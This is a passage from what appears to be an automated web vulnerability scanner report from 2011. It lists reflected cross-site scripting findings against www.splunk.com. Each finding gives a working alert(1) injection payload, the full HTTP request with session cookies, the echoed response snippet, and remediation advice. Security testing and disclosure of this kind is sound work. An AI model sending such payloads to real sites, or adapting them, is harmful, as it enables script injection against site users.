<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... geVersion( ) { var versionIndex = document.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base22f49'-alert(1)-'27f5c74605b/Documentation/4.1.6/ReleaseNotes/4.1.6'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base22f49'-alert(1)-'27f5c74605b/ ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b23e5"><script>alert(1)</script>b80d5d28cc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base/Documentationb23e5"><script>alert(1)</script>b80d5d28cc8/4.1.6/ReleaseNotes/4.1.6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/base/Documentationb23e5"><script>alert(1)</script>b80d5d28cc8/4.1.6/ReleaseNotes/4.1.6"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30c2e'-alert(1)-'485dbeda54d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base/Documentation30c2e'-alert(1)-'485dbeda54d/4.1.6/ReleaseNotes/4.1.6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]...
var versionIndex = document.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base/Documentation30c2e'-alert(1)-'485dbeda54d/4.1.6/ReleaseNotes/4.1.6'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base/Documentation30c2e'-alert(1)-'485dbeda54d/ ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85f96"><script>alert(1)</script>f1da85a8e18 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base/Documentation/4.1.6/ReleaseNotes85f96"><script>alert(1)</script>f1da85a8e18/4.1.6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes85f96"><script>alert(1)</script>f1da85a8e18/4.1.6"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b124b'-alert(1)-'794bc2e4b1f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base/Documentation/4.1.6/ReleaseNotesb124b'-alert(1)-'794bc2e4b1f/4.1.6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... ex = document.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base/Documentation/4.1.6/ReleaseNotesb124b'-alert(1)-'794bc2e4b1f/4.1.6'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base/Documentation/4.1.6/ReleaseNotesb124b'-alert(1)-'794bc2e4b1f/ ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4903'-alert(1)-'c75c866ef81 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base/Documentation/4.1.6/ReleaseNotes/4.1.6c4903'-alert(1)-'c75c866ef81 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... ocument.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base/Documentation/4.1.6/ReleaseNotes/4.1.6c4903'-alert(1)-'c75c866ef81'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base/Documentation/4.1.6/ReleaseNotes/4.1.6c4903'-alert(1)-'c75c866ef81" ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7155c"><script>alert(1)</script>509478c60a1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base/Documentation/4.1.6/ReleaseNotes/4.1.67155c"><script>alert(1)</script>509478c60a1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.67155c"><script>alert(1)</script>509478c60a1"> ...[SNIP]...
4.385. http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.6 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/base/Documentation/4.1.6/ReleaseNotes/4.1.6
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb1fc"><script>alert(1)</script>4c5aeb902fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base/Documentation/4.1.6/ReleaseNotes/4.1.6?cb1fc"><script>alert(1)</script>4c5aeb902fb=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.6?cb1fc"><script>alert(1)</script>4c5aeb902fb=1"> ...[SNIP]...
4.386. http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.6 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/base/Documentation/4.1.6/ReleaseNotes/4.1.6
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2080b'-alert(1)-'fc4b5596287 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base/Documentation/4.1.6/ReleaseNotes/4.1.6?2080b'-alert(1)-'fc4b5596287=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... cument.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base/Documentation/4.1.6/ReleaseNotes/4.1.6?2080b'-alert(1)-'fc4b5596287=1'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base/Documentation/4.1.6/ReleaseNotes/4.1.6?2080b'-alert(1)-'fc4b55962 ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7c511--><script>alert(1)</script>73db74c99c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cave7c511--><script>alert(1)</script>73db74c99c9/narc.php?u=/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw&r=http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg&a=Adwords_Unix&cid= HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567; Enabled=true
The value of REST URL parameter 2 is copied into an HTML comment. The payload bfe11--><script>alert(1)</script>c54ef0afa5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cave/narc.phpbfe11--><script>alert(1)</script>c54ef0afa5d?u=/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw&r=http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg&a=Adwords_Unix&cid= HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567; Enabled=true
The value of REST URL parameter 1 is copied into an HTML comment. The payload 4885f--><script>alert(1)</script>a3f95461609 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /company4885f--><script>alert(1)</script>a3f95461609 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.390. http://www.splunk.com/company [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/company
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4ebc4--><script>alert(1)</script>454624173e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /company?4ebc4--><script>alert(1)</script>454624173e1=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:19:31 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27416
